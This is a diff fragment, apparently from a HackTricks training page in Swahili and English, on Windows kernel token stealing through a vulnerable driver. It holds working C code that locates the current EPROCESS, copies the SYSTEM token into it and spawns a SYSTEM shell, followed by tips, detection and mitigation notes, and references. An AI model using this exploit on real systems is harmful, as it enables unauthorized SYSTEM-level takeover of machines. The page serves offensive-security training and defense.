EPROC_SYS; // list is circular +uint64_t EPROC_ME = 0; +do { +uint64_t pid; kread_qword(h, cur + Off_EPROCESS_UniquePid, &pid); +if ((DWORD)pid == myPid) { EPROC_ME = cur; break; } +uint64_t flink; kread_qword(h, cur + Off_EPROCESS_ActiveLinks, &flink); +cur = flink - Off_EPROCESS_ActiveLinks; // CONTAINING_RECORD +} while (cur != EPROC_SYS); + +// 4) Read tokens +uint64_t tok_sys, tok_me; +kread_qword(h, EPROC_SYS + Off_EPROCESS_Token, &tok_sys); +kread_qword(h, EPROC_ME + Off_EPROCESS_Token, &tok_me); + +// 5) Mask EX_FAST_REF low bits and splice refcount bits +uint64_t tok_sys_mask = tok_sys & ~0xF; // or ~0x7 on some builds +uint64_t tok_new = tok_sys_mask | (tok_me & 0x7); + +// 6) Write back +kwrite_qword(h, EPROC_ME + Off_EPROCESS_Token, tok_new); + +// 7) We are SYSTEM now +system("cmd.exe"); +return 0; +} +``` +Vidokezo: +- Offsets: Tumia WinDbg’s `dt nt!_EPROCESS` na PDBs za lengo, au runtime symbol loader, ili kupata offsets sahihi. Usifanye hardcode bila tahadhari. +- Mask: On x64 the token is an EX_FAST_REF; low 3 bits are reference count bits. Kuendelea na low bits za asili kutoka token yako kuepuka matatizo ya refcount mara moja. +- Stability: Pendelea kuinua current process; ikiwa unainua helper mfupi unaweza kupoteza SYSTEM anapoondoka. + +## Ugunduzi na kupunguza +- Kupakia unsigned au untrusted third‑party drivers ambazo zinaonyesha IOCTLs zenye nguvu ndizo chanzo cha tatizo. +- Kernel Driver Blocklist (HVCI/CI), DeviceGuard, and Attack Surface Reduction rules zinaweza kuzuia vulnerable drivers kupakiwa. +- EDR inaweza kuangalia mfululizo wa IOCTL unaoshukiwa ambao unatekeleza arbitrary read/write na token swaps. + +## Marejeleo +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [FuzzySecurity – Windows Kernel ExploitDev (token stealing examples)](https://www.fuzzysecurity.com/tutorials/expDev/17.html) + +{{#include ../../banners/hacktricks-training.md}}